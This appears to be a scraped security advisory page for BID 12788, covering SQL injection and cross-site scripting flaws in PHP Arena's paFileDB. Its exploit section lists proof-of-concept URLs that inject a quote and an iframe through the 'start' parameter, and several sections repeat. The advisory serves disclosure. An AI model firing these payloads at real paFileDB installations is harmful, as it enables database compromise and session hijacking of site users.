PAFileDB Multiple SQL Injection And Cross-Site Scripting Vulnerabilities
BID:12788
Info
PAFileDB Multiple SQL Injection And Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 12788 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-0780 CVE-2005-0781 CVE-2005-0782 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 12 2005 12:00AM |
| Updated: | Jul 12 2009 10:56AM |
| Credit: | Discovery is credited to sp3x. |
| Vulnerable: |
PHP Arena paFileDB 3.1 PHP Arena paFileDB 3.0 Beta 3.1 PHP Arena paFileDB 3.0 PHP Arena paFileDB 2.1.1 PHP Arena paFileDB 1.1.3 |
| Not Vulnerable: | |
Discussion
PAFileDB Multiple SQL Injection And Cross-Site Scripting Vulnerabilities
Multiple SQL injection and cross-site scripting vulnerabilities exist in paFileDB. These issues are reported to exist in the 'viewall.php' and 'category.php' scripts.
Exploitation of these issues may allow for compromise of the software, session hijacking, or attacks against the underlying database.
Multiple SQL injection and cross-site scripting vulnerabilities exist in paFileDB. These issues are reported to exist in the 'viewall.php' and 'category.php' scripts.
Exploitation of these issues may allow for compromise of the software, session hijacking, or attacks against the underlying database.
Exploit / POC
PAFileDB Multiple SQL Injection And Cross-Site Scripting Vulnerabilities
The following examples were provided to demonstrate SQL injection:
http://www.example.com/[pafiledb_dir]/pafiledb.php?action=viewall&start='&sortby=rating
http://www.example.com/[pafiledb_dir]/pafiledb.php?action=category&start='&sortby=rating
The following examples were provided to demonstrate cross-site scripting:
http://www.example.com/[pafiledb_dir]/pafiledb.php?action=viewall&start="><iframe%20src=http://www.securityreason.com></iframe
>&sortby=rating
http://www.example.com/[pafiledb_dir]/pafiledb.php?action=category&start="><iframe%20src=http://www.securityreason.com></ifram
e>&sortby=date
The following examples were provided to demonstrate SQL injection:
http://www.example.com/[pafiledb_dir]/pafiledb.php?action=viewall&start='&sortby=rating
http://www.example.com/[pafiledb_dir]/pafiledb.php?action=category&start='&sortby=rating
The following examples were provided to demonstrate cross-site scripting:
http://www.example.com/[pafiledb_dir]/pafiledb.php?action=viewall&start="><iframe%20src=http://www.securityreason.com></iframe
>&sortby=rating
http://www.example.com/[pafiledb_dir]/pafiledb.php?action=category&start="><iframe%20src=http://www.securityreason.com></ifram
e>&sortby=date
Solution / Fix
PAFileDB Multiple SQL Injection And Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PAFileDB Multiple SQL Injection And Cross-Site Scripting Vulnerabilities
References:
References:
- paFileDB Homepage (PHP Arena)
- [SECURITYREASON.COM] SQL injection and XSS in paFileDB (SecurityReason